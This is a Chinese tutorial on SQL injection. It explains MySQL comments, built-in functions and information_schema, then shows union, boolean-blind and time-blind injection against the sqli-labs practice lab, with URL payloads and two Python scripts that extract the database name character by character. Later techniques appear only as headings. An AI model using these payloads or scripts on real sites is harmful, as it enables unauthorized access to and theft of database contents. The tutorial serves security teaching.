sql注入漏洞原理

什么是 SQL 注入

SQL 注入类型

常见 SQL 注入类型有7种，分别是：联合注入、布尔盲注、时间盲注、宽字节注入、报错注入（floor 报错注入、updatexml报错注入、extractvalue报错注入）、堆叠注入、二次注入。

MySQL 基础知识

SQL语句中的特殊字符

注释

单行注释：
- 单行注释可以使用 # 注释符，# 注释符后直接加注释内容
- 单行注释可以使用--注释符，--注释符后需要加一个空格，注释才能生效

#从结果中删除重复行
SELECT DISTINCT product_id, purchase_price FROM Product;

-- 从结果中删除重复行
SELECT DISTINCT product_id, purchase_price FROM Product;

多行注释

多行注释使用 /* */ 注释符。/* 用于注释内容的开头，*/ 用于注释内容的结尾。多行注释格式如下

/*这条SELECT语句，
  会从结果中删除重复行*/
SELECT DISTINCT product_id, purchase_price FROM Product;

小知识

如果参数从 url 传入，url 中的参数值出现 +，空格，/，?，%，#，& 等特殊符号的时候就自动变成空格。所以 sql 注入常见的单行注释用 --+ ，如果想使用 # 做注释，就需要使用 url 编码，# 的 url 编码是 %23

举例

http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 1--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 1%23

MySQL 内置函数

发现 SQL 注入点之后，可以利用数据库的默认函数和自带的数据库，进一步收集数据库相关信息，包括数据库类型、版本号，数据库表等。利于后续漏洞利用

内置函数

描述

限制

version()

获取操作系统版本号

database()

获取当前使用的数据库

user()

获取当前使用数据库的用户

@@version_compile_os

获取操作系统类型

@@datadir

获取数据库路径

样例如下

mysql> select version();
+-------------------------+
| version()               |
+-------------------------+
| 5.7.33-0ubuntu0.16.04.1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select database();
+------------+
| database() |
+------------+
| security   |
+------------+
1 row in set (0.00 sec)

mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

mysql> select @@version_compile_os;
+----------------------+
| @@version_compile_os |
+----------------------+
| Linux                |
+----------------------+
1 row in set (0.00 sec)

mysql> select @@datadir;
+-----------------+
| @@datadir       |
+-----------------+
| /var/lib/mysql/ |
+-----------------+
1 row in set (0.00 sec)

MySQL 内置数据库

MySQL 默认数据库 information_schema 有三个关键数据表：schemata，tables, columns

schemata 表中有字段叫 schema_name，存放的数据是数据库中所有数据库的名称
tables 表中有字段 table_name(表名)，table_schema(表所在的数据库名)
columns 表中有字段 column_name(字段名), table_name(字段所在的表)

如此注入流程就如下：

查询语句

描述

select schema_name from information_schema.schemata

查询所有数据库

select table_name from information_schema.tables where table_schema='xxx'

查询 xxx 数据库的所有表

select column_name from information_schema.columns where table_name='xxx'

查询 xxx 表的列名

select xxx from xxx

获取数据

样例如下


mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
| challenges         |
| mysql              |
| performance_schema |
| security           |
| sys                |
+--------------------+
6 rows in set (0.00 sec)

mysql> select table_name from information_schema.tables where table_schema="security";
+------------+
| table_name |
+------------+
| emails     |
| referers   |
| uagents    |
| users      |
+------------+
4 rows in set (0.00 sec)

mysql>  select column_name from information_schema.columns where table_name="users";
+---------------------+
| column_name         |
+---------------------+
| USER                |
| CURRENT_CONNECTIONS |
| TOTAL_CONNECTIONS   |
| id                  |
| username            |
| password            |
+---------------------+
6 rows in set (0.00 sec)

联合注入

顾名思义，联合注入是使用联合查询进行注入的一种方式。联合注入应用的常见一般是有查询结果返回，结合联合查询，可以查询到自己想要的结果。

查询语句以 union 关键字连接起来，返回多条查询语句的并集。
每条查询语句的返回结果列数需要一致。

联合查询举例

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

mysql> select * from emails;
+----+------------------------+
| id | email_id               |
+----+------------------------+
|  1 | [email protected]       |
|  2 | [email protected]       |
|  3 | [email protected]    |
|  4 | [email protected]   |
|  5 | [email protected]   |
|  6 | [email protected] |
|  7 | [email protected]   |
|  8 | [email protected]      |
+----+------------------------+
8 rows in set (0.00 sec)

mysql> select * from emails union select * from users;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

mysql> select * from emails union select id, username from users;
+----+------------------------+
| id | email_id               |
+----+------------------------+
|  1 | [email protected]       |
|  2 | [email protected]       |
|  3 | [email protected]    |
|  4 | [email protected]   |
|  5 | [email protected]   |
|  6 | [email protected] |
|  7 | [email protected]   |
|  8 | [email protected]      |
|  1 | Dumb                   |
|  2 | Angelina               |
|  3 | Dummy                  |
|  4 | secure                 |
|  5 | stupid                 |
|  6 | superman               |
|  7 | batman                 |
|  8 | admin                  |
|  9 | admin1                 |
| 10 | admin2                 |
| 11 | admin3                 |
| 12 | dhakkan                |
| 14 | admin4                 |
+----+------------------------+
21 rows in set (0.00 sec)

联合注入示例

联合注入关键在于确定数据库查询结果的列数，查询结果的列数，可以使用使用 union select 或 order by 语句探测查询结果的字段。

如 sqli-labs-php7 的 Less-1

使用 union select 语句爆破，payload 如下

http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' union select 1--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' union select 1,2--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' union select 1,2,3--+

前两个 payload 都是如下报错，union 前后两个语句列数不一样直到第三个 payload 才回显正确结果，说明原始查询结果有三列

使用 order by 指数（order by数字以2的n次方指数增加）和二分法爆破，payload 如下

http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 1--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 2--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 4--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 8--+

前两个 payload 都是能够正确回显直到第三个 payload，说明查询结果没有 4 列那么多，这时候就可以知道列数有三列。如果第三个payload是正常的，第四个payload是异常的，那么取中间值，也就是6((4+8)/2 = 6)继续爆破。

联合注入常用函数

联合注入常使用如下字符串拼接函数

内置函数

描述

举例

concat(str1, str2, ...)

拼接字符串

concat("1", "2", "3") --> "123"

concat_ws(separator, str1, str2, ..)

拼接字符串，各个字符之间插入separator

concat("/", "1", "2", "3") --> "1/2/3"

group_concat(column_name)

将查询结果用,拼接成一个字符串

select group_concat(username) from users; --> "user1,user2,user3 .."

样例


mysql> select concat("123", 456);
+--------------------+
| concat("123", 456) |
+--------------------+
| 123456             |
+--------------------+
1 row in set (0.00 sec)

mysql> select concat("123", "456");
+----------------------+
| concat("123", "456") |
+----------------------+
| 123456               |
+----------------------+
1 row in set (0.00 sec)

mysql> select concat_ws("/","123", "456");
+-----------------------------+
| concat_ws("/","123", "456") |
+-----------------------------+
| 123/456                     |
+-----------------------------+
1 row in set (0.00 sec)

mysql> select group_concat(username) from users;
+---------------------------------------------------------------------------------------------+
| group_concat(username)                                                                      |
+---------------------------------------------------------------------------------------------+
| Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 |
+---------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

布尔盲注

布尔盲注的常见一般是存在注入的 sql 语句的执行结果只返回布尔值 True或False，那么布尔盲注就是根据页面返回的True或者是False来得到数据库中的相关信息。

布尔注入常用函数

函数

描述

举例

length(str)

返回值为字符串的字节长度

length("123") --> 3

ascii(char)

把字符转换成ascii码值的函数

ascii('0') --> 48

substr(str, pos, len)

在str中从pos开始的位置（起始位置为1），截取len个字符

count()

统计表中记录的一个函数，返回匹配条件的行数

sql 语句 limit关键字

limit m ：检索前m行数据，显示1-10行数据（m>0）
limit x, y：检索从x+1行开始的y行数据

mysql> select  length("123");
+---------------+
| length("123") |
+---------------+
|             3 |
+---------------+
1 row in set (0.00 sec)

mysql> select ascii('0');
+------------+
| ascii('0') |
+------------+
|         48 |
+------------+
1 row in set (0.01 sec)

mysql> select substr("12345", 2, 3);
+-----------------------+
| substr("12345", 2, 3) |
+-----------------------+
| 234                   |
+-----------------------+
1 row in set (0.00 sec)

mysql> select count(username) from security.users;
+-----------------+
| count(username) |
+-----------------+
|              13 |
+-----------------+
1 row in set (0.01 sec)

mysql> select * from security.users limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from security.users limit 3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
+----+----------+------------+
3 rows in set (0.00 sec)

布尔盲注示例

如 sqli-labs-php7 的 Less-8，利用布尔盲注获取数据库名

当返回的页面包含 "You are in" 字符串时为 true，否则为false

布尔盲注获取数据库名思路：

获取数据库名的长度，遍历或用二分法爆破http://192.168.154.135/sqli-labs-php7/Less-8/?id=1' and length(database())=n--+种的n，当返回 true 的时候得到数据库的长度
使用ascii、substr、database函数，利用二分法爆破数据库名称，如 http://192.168.154.135/sqli-labs-php7/Less-8/?id=1' and ascii(substr(database(), i, 1))=n--+ 种的第 i 个字符对应的 ascii 码为 n，那么对应的字符为 chr(n)

利用 python 脚本爆破数据库名如下：

import requests

url = "http://192.168.154.135/sqli-labs-php7/Less-8/"


def get_dblen(url):
    para = "?id=1' and length(database())=%d--+"
    url = url + para
    for i in range(20):
        rsp = requests.get(url % (i,))
        if "You are in" in rsp.content.decode("utf-8"):
            return i


def get_dbname(url):
    dblen = get_dblen(url)
    para = "?id=1' and ascii(substr(database(),  %d, 1))<%d--+"
    url = url + para
    dbname = []
    for i in range(1, dblen + 1):
        left = 0
        right = 256
        while True:
            if left == right or left  == (right - 1):
                dbname.append(chr(left))
                break
            rsp = requests.get(url % (i, (left + right) / 2))
            if "You are in" not in rsp.content.decode("utf-8"):
                left = int((left + right) / 2)
            else:
                right = int((left + right) / 2)
    return "".join(dbname)


if __name__ == "__main__":
    print(get_dbname(url))

时间盲注

在SQL注入过程中，无论注入是否成功，页面完全没有变化，无法通过页面判断是否存在注入，只能通过使用数据库的延时函数，根据执行返回的时长变化来判断是否存在注入。

时间盲注常使用 if(expr1, expr2, expr3), 其中 expr2 通常为 sleep 函数，当 expr1 为 true 时，返回 expr2, 否则返回 expr3。时间盲注常可以看作是布尔注入。

如 sqli-labs-php7 的 Less-9，利用时间盲注获取数据库名

import requests

url = "http://192.168.154.135/sqli-labs-php7/Less-9/"
             

def get_dblen(url):
    para = "?id=1' and if(length(database())=%d, sleep(0.1), null)--+"
    url = url + para
    rsp = requests.get(url % (8,))
    for i in range(20):
        rsp = requests.get(url % (i,))
        if rsp.elapsed.total_seconds() >= 0.1:
            return i


def get_dbname(url):
    dblen = get_dblen(url)
    para = "?id=1' and if(ascii(substr(database(),  %d, 1))<%d, sleep(0.1), null)--+"
    url = url + para
    dbname = []
    for i in range(1, dblen + 1):
        left = 0
        right = 256
        while True:
            if left == right or left == (right - 1):
                dbname.append(chr(left))
                break
            rsp = requests.get(url % (i, (left + right) / 2))
            if rsp.elapsed.total_seconds() < 0.1:
                left = int((left + right) / 2)
            else:
                right = int((left + right) / 2)
    return "".join(dbname)


if __name__ == "__main__":
    print(get_dbname(url))

hashtag什么是 SQL 注入

hashtagSQL 注入类型

hashtagMySQL 基础知识

hashtagSQL语句中的特殊字符

hashtag注释

hashtagMySQL 内置函数

hashtagMySQL 内置数据库

hashtag联合注入

hashtag联合注入示例

hashtag联合注入常用函数

hashtag布尔盲注

hashtag布尔注入常用函数

hashtag布尔盲注示例

hashtag时间盲注

hashtag宽字节注入

hashtag报错注入

hashtagfloor报错注入

hashtagupdatexml报错注入

hashtagextractvalue报错注入

hashtag堆叠注入

hashtag二次注入

什么是 SQL 注入

SQL 注入类型

MySQL 基础知识

SQL语句中的特殊字符

注释

MySQL 内置函数

MySQL 内置数据库

联合注入

联合注入示例

联合注入常用函数

布尔盲注

布尔注入常用函数

布尔盲注示例

时间盲注

宽字节注入

报错注入

floor报错注入

updatexml报错注入

extractvalue报错注入

堆叠注入

二次注入